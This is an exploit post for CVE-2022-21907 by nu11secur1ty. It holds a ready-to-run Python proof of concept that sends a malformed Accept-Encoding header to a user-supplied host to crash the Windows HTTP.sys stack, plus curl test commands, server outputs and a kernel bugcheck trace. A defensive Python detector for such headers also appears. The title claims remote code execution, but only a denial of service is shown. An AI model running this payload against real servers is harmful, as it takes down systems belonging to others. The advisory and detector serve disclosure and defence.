HTTP Protocol Stack Denial Of Service / Remote Code Execution

Posted Jan 17, 2022
Authored by nu11secur1ty

Proof of concept for a Microsoft HTTP protocol stack vulnerability that causes a denial of service.

tags | exploit, web, denial of service, protocol, proof of concept
advisories | CVE-2022-21907
SHA-256 | c2c18115a401a528cf1b5dc31c17571b0980e3c441f00ab74bcca4c29d729334

```python
#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907

from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED + "Please input your host...\n")
print(Style.RESET_ALL)

print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)

print(Fore.BLUE + "Sending an especially malicious crafted packet, please wait...")
print(Style.RESET_ALL)
time.sleep(17)

print(Fore.GREEN)
# The PoC :)  A single GET whose Accept-Encoding header carries a long list of
# unknown codings; the trailing backslashes continue the string literal.
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
'AAAAAAAAAAAAAAAAAAAAAAAA,\
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
****************************stupiD, *, ,',})
# Not necessary :)
print(poc,"\n")
print(Style.RESET_ALL)
```

---- Original Advisory ----

## Title: HTTP.sys buffer overflow denial of service
## Author: nu11secur1ty
## Date: 01.12.2022
## Vendor: https://docs.microsoft.com/
## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0
## CVE-2022-21907

## Description:
NOTE: After a couple of hours of tests and experiments, there were no
vulnerabilities when we decided to install the IIS packages on these
Windows platforms; it's OK, and everything is patched! Windows Server
2019 and Windows 10 version 1809 (2018) are not vulnerable by default,
but on Windows 10 version 2004 (2020) the HTTP Protocol Stack (HTTP.sys)
is vulnerable to a buffer overflow: denial of service and a restart of
the system.
The attacker can send a maliciously crafted package to the headers of
the HTTP server of the system, and this will be critical for this
system!
Not correctly sanitizing!
Status: CRITICAL

## Simple test connection before debugging

```cmd
curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```

## 302

```cmd
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```

## 404

```cmd
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```

## Bugcheck:

```cmd
1: kd> kp
Child-SP RetAddr Call Site
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28
1: kd> !analyze
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa10287993480, Address of the trap frame for the exception
that caused the bugcheck
Arg3: ffffa102879933d8, Address of the exception record for the
exception that caused the bugcheck
Arg4: 0000000000000000, Reserved

Debugging Details:
------------------

*** WARNING: Unable to verify timestamp for win32k.sys

BUGCHECK_CODE: 139

BUGCHECK_P1: 3

BUGCHECK_P2: ffffa10287993480

BUGCHECK_P3: ffffa102879933d8

BUGCHECK_P4: 0

PROCESS_NAME: System

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of
a stack-based buffer in this application. This overrun could
potentially allow a malicious user to gain control of this
application.

SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63

MODULE_NAME: HTTP

IMAGE_NAME: HTTP.sys

FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList

FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd}

Followup: MachineOwner
---------
```
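A defender-side check derived from the call stack above (the crash is reached through HTTP!UlpParseAcceptEncoding and the freeing of its unknown-coding list): this added example, not part of the advisory or the PoC, flags Accept-Encoding values that carry unregistered, oversized, or unusually many codings so a reverse proxy or log review can spot probing before it reaches an unpatched HTTP.sys host. The log line format, the IP addresses and the thresholds are constructed for the example.

```python
import re
from typing import List

# Content-codings a legitimate client sends: the IANA registry entries plus the wildcard.
KNOWN_CODINGS = {"gzip", "x-gzip", "deflate", "br", "compress", "x-compress",
                 "identity", "zstd", "*"}
# Token characters permitted by the HTTP header grammar (RFC 9110 tchar).
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def accept_encoding_findings(value: str, max_codings: int = 8,
                             max_len: int = 32) -> List[str]:
    """Return why an Accept-Encoding value looks hostile; an empty list means benign."""
    # Each element is 'coding[;q=weight]'; only the coding name matters here.
    codings = [e.split(";", 1)[0].strip() for e in value.split(",") if e.strip()]
    findings = []
    if len(codings) > max_codings:
        findings.append(f"{len(codings)} codings listed (limit {max_codings})")
    unknown = [c for c in codings if c.lower() not in KNOWN_CODINGS]
    if unknown:
        findings.append(f"{len(unknown)} unregistered coding(s), first {unknown[0][:16]!r}")
    malformed = [c for c in codings if not TOKEN_RE.match(c)]
    if malformed:
        findings.append(f"{len(malformed)} coding(s) contain non-token characters")
    oversized = [c for c in codings if len(c) > max_len]
    if oversized:
        findings.append(f"{len(oversized)} coding(s) longer than {max_len} bytes")
    return findings


def scan_log(lines: List[str]) -> List[str]:
    """Flag constructed proxy log lines of the form '<ip> <path> "<Accept-Encoding>"'."""
    flagged = []
    for line in lines:
        ip, path, quoted = line.split(" ", 2)
        findings = accept_encoding_findings(quoted.strip('"'))
        if findings:
            flagged.append(f"{ip} {path}: " + "; ".join(findings))
    return flagged


# Constructed sample log lines: a normal browser, the advisory's curl test, and a
# request mimicking the PoC's long comma-separated junk list.
SAMPLE_LOG = [
    '10.0.0.5 /index.html "gzip, deflate, br;q=0.9"',
    '10.0.0.7 /201 "pwn, pwned, package"',
    '10.0.0.9 / "' + ", ".join(["A" * 40] * 6 + ["****stupiD", "*", "", "'"]) + '"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same function can sit in a WAF rule or a log-forwarding filter; on a patched host the hits are still useful as an early sign that the service is being probed.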

## Reproduce:
[GitHub repository](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907)

## Proof and Exploit:
[Streamable video](https://streamable.com/fbojva)
